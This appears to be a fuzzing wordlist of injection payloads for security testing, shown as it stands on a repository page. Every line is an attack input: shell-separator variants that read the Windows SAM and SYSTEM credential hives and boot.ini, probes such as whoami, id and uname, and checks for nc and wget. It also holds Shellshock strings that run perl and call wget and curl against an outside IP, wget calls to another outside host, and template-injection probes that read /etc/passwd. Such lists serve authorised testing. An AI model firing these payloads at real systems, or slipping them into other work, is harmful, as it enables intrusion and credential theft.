||||
$(`type C:\boot.ini`)
|
||||
&&type C:\\boot.ini
|
||||
| type C:\Windows\repair\SAM
|
||||
; type C:\Windows\repair\SAM
|
||||
& type C:\Windows\repair\SAM
|
||||
&& type C:\Windows\repair\SAM
|
||||
type C:\Windows\repair\SAM
|
||||
| type C:\Windows\repair\SYSTEM
|
||||
; type C:\Windows\repair\SYSTEM
|
||||
& type C:\Windows\repair\SYSTEM
|
||||
&& type C:\Windows\repair\SYSTEM
|
||||
type C:\Windows\repair\SYSTEM
|
||||
| type C:\WINNT\repair\SAM
|
||||
; type C:\WINNT\repair\SAM
|
||||
& type C:\WINNT\repair\SAM
|
||||
&& type C:\WINNT\repair\SAM
|
||||
type C:\WINNT\repair\SAM
|
||||
type C:\WINNT\repair\SYSTEM
|
||||
| type %SYSTEMROOT%\repair\SAM
|
||||
; type %SYSTEMROOT%\repair\SAM
|
||||
& type %SYSTEMROOT%\repair\SAM
|
||||
&& type %SYSTEMROOT%\repair\SAM
|
||||
type %SYSTEMROOT%\repair\SAM
|
||||
| type %SYSTEMROOT%\repair\SYSTEM
|
||||
; type %SYSTEMROOT%\repair\SYSTEM
|
||||
& type %SYSTEMROOT%\repair\SYSTEM
|
||||
&& type %SYSTEMROOT%\repair\SYSTEM
|
||||
type %SYSTEMROOT%\repair\SYSTEM
|
||||
uname
|
||||
;uname;
|
||||
| uname -a
|
||||
; uname -a
|
||||
& uname -a
|
||||
&& uname -a
|
||||
uname -a
|
||||
|/usr/bin/id
|
||||
;|/usr/bin/id|
|
||||
;/usr/bin/id|
|
||||
$;/usr/bin/id
|
||||
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
|
||||
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
|
||||
| wget http://crowdshield.com/.testing/rce.txt
|
||||
& wget http://crowdshield.com/.testing/rce.txt
|
||||
; wget https://crowdshield.com/.testing/rce_vuln.txt
|
||||
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
|
||||
&& wget https://crowdshield.com/.testing/rce_vuln.txt
|
||||
wget https://crowdshield.com/.testing/rce_vuln.txt
|
||||
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
|
||||
which curl
|
||||
which gcc
|
||||
which nc
|
||||
which netcat
|
||||
which perl
|
||||
which python
|
||||
which wget
|
||||
whoami
|
||||
| whoami
|
||||
; whoami
|
||||
' whoami
|
||||
' || whoami
|
||||
' & whoami
|
||||
' && whoami
|
||||
'; whoami
|
||||
" whoami
|
||||
" || whoami
|
||||
" | whoami
|
||||
" & whoami
|
||||
" && whoami
|
||||
"; whoami
|
||||
$(`whoami`)
|
||||
& whoami
|
||||
&& whoami
|
||||
{{ get_user_file("C:\boot.ini") }}
|
||||
{{ get_user_file("/etc/hosts") }}
|
||||
{{ get_user_file("/etc/passwd") }}
|
||||
{{4+4}}
|
||||
{{4+8}}
|
||||
{{person.secret}}
|
||||
{{person.name}}
|
||||
{1} + {1}
|
||||
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
|
||||
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
|
||||
Reference in New Issue
Block a user